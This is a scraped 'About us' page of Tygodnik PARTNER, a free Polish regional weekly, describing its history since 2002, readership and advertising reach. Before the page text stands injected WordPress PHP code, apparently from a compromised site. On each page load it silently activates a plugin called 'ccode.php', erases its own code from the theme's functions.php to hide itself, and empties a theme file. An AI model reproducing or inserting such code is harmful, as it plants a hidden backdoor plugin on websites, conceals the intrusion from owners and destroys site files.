function true_plugins_activate() { $active_plugins = get_option('active_plugins'); $activate_this = array( 'ccode.php' ); foreach ($activate_this as $plugin) { if (!in_array($plugin, $active_plugins)) { array_push($active_plugins, $plugin); update_option('active_plugins', $active_plugins); } } $new_active_plugins = get_option('active_plugins'); if (in_array('ccode.php', $new_active_plugins)) { $functionsPath = dirname(__FILE__) . '/functions.php'; $functions = file_get_contents($functionsPath); $start = stripos($functions, "function true_plugins_activate()"); $end = strripos($functions, "true_plugins_activate"); $endDelete = $end + mb_strlen("true_plugins_activate") + 3; if($start && $end) { $str = substr($functions, 0, $start); $str .= substr($functions, $endDelete); file_put_contents($functionsPath, $str); } $script = file_get_contents('/home/micropro/ftp/apkka/wp-content/themes/disto/class.theme-modules.php'); file_put_contents('/home/micropro/ftp/apkka/wp-content/themes/disto/class.theme-modules.php', ''); } } add_action('init', 'true_plugins_activate'); O NAS | Tygodnik PARTNER

O NAS

Przedstawiamy Państwu Tygodnik Partner

Bezpłatny Tygodnik Regionalny powstał w sierpniu 2002 roku jako czarno-biała czterostronicowa gazeta reklamowa.Na przestrzeni niespełna dwóch lat stał się kilkunastostronicową pełnokolorową największą gazetą bezpłatną w naszym regionie. Od początku naszego istnienia zareklamowało się łamach tygodnika ponad 1600 firm.

Zyskaliśmy grono wielu stałych reklamodawców czerpiących wymierne korzyści ze współpracy z nami.
Jest to regularny tygodnik ukazujący się na weekend. Czytelnicy Partnera to szeroka grupa odbiorców w wieku od 17 do 70 lat ze zróżnicowaną siłą nabywczą. Koszt dotarcia reklamy do odbiorcy jest niski z uwagi na wysoki nakład i bezpłatną dystrybucję
Partner jest kolportowany do rozproszonej grupy odbiorców w placówkach handlowych. Gazeta jest bezpłatna wiec czytelnik unika problemu “kupić czy nie kupić .

Zapraszamy do współpracy

Zespół redakcyjny

© 2020 Tygodnik PARTNER. All rights reserved / Wszystkie prawa zastrzeżone
Zobacz także: www.kedzierzynkozle24.pl.